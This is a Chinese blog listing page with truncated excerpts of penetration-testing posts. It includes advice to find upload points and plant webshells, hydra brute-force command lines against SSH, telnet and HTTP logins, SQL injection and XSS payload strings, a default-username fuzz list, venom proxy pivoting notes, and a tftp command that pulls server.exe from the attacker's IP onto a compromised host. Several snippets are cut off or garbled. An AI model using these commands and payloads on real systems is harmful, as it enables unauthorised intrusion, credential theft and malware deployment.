- 博客(12)
- 收藏
- 关注
原创 渗透测试经验总结
test,test;无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!7.一般的大站很少有用现成的CMS的,于是如果你有幸找到源码,那你就发了,注入漏洞啊,上传漏洞啊,写文件漏洞啊,都掌握在你手里。13.想搞一般的小站,记得查看这个小站的版权,找做这个站的公司,然后从这个公司做的其他站下手,得到源码再回头搞,我曾经通过这个方法拿下某知名制药的公司站。
2023-08-25 19:28:46 206 1
原创 渗透测试流程
上面的思路如果用好了我想拿下一个普通站应该是可以的,不过这只是通用的思路,主要还是要多看别人写的入侵经验,因为漏洞是怎么也说不完的,比如我以上写的思路很多常用的漏洞的尝试并没有写进去,比如xss,但是如果用xss那站一定是一个漫长的过程,记得一前看别人写的渗透清华大学,就是捡的分站日,而且是用一个列目录的漏洞,然后找到了一个数据库管理目录拿到一句话的,再次说一遍,思路不是死的。接下来很重要的一点就是,无论什么站,都不要放弃尝试,这很重要。找信息,找弱点,其它的就沿着第二种到第一种的思路吧。
2023-08-24 20:23:54 65 1
原创 Linux系统下基本命令
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)cd cd ..回到上一层目录,注意cd 与..之间有空格。cat >abc.txt 往abc.txt文件中写上内容。rm 文件名 删除文件,rm -a 目录名删除目录及子目录。more 文件名 以一页一页的方式显示一个文本文件。uname 显示版本信息(同win2K的 ver)chmod 设定档案或目录的存取权限。
2023-08-23 16:52:55 56
原创 MYSQL 命令
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
2023-08-23 16:51:32 63
原创 CMD命令大全
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送。dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间。复制本地c:\srv.exe到对方的admin下。
2023-08-23 16:50:22 126
原创 js接口fuzz参数模糊测试
upload.jsswipe.jsindex.jsadmin.jsinfo.jsaddinfo.jsbanner.jsclass.jscommon.jsconfig.jsjcode.jsjson.jsjson1.jsjson2.jslogin.jslink.jslinkage.jsopen.jsopenapp.jsreview.jsscripts.jsscript.jsselect.js。
2023-08-23 16:36:07 126
原创 nmap使用参数中文介绍
-icmp-orig-time 设置icmp原始时间戳--icmp-recv-time 设置icmp接受时间戳--icmp-trans-time 设置icmp发送的时间戳--arp-type arp类型(ARP-reply, RARP, RARP-reply)--arp-sender-mac 发送人的mac地址--arp-sender-ip 设置发件人ip地址--arp-target-mac 设置目标mac地址--arp-target-ip 设置目标ip地址-S 设置源ip地址。
2023-08-23 15:46:41 403
原创 渗透测试红队工具端口代理及转发工具
venom是一款为渗透测试人员设计的go开发是代理工具。可以继续多个节点连接。可以使用venom将网络流量代理到内网。端口 建立sock5代理 端口99999。setdes/getdes 设置/获取节点。支持多种平台win,linux。获取节点的交互shell。goto id,进入agent节点。download、节点下载文件。使用help打印帮助信息。upload、向节点上传。show显示,网络拓扑。
2023-08-23 15:27:46 110
原创 hydra 密码破解工具的使用
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /web/index.asp。hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /web/hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V。hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh2。-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探。
2023-08-22 19:16:05 98
原创 渗透测试user参数top500模糊测试
admintesttest01test1test2weblogicftpmanagermanageuserguestaccountsupersuperusermasterimapmemcachedmongodboraclepop3postgresqlrdpredissmbsmtpsqlserversshsvntelnettomcatvncxiaomihuaweiapple。
2023-08-22 18:19:02 163
原创 新人burp上xss漏洞poc 通用fuzz参数
">XSSb={};{{{}.")));}}{{{}.")));{{{}.")));}}}}}}}}}}b={};{}.")));
2023-08-22 18:08:42 196
原创 sql注入漏洞poc代码fuzz代码
"or "a"="aor 1=1--'or 1=1--"or 1=1--'or'a'='a'or''=''or'='or''OR 1=1"or 1=1'xor'or 1=1/*1'or'1'='1or a = a1 or 1=1a'?' or 1=1--------23 OR 1=10 or 1=1or 0=0 --' or 0=0 #or 0=0 #"
2023-08-22 18:04:20 221
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人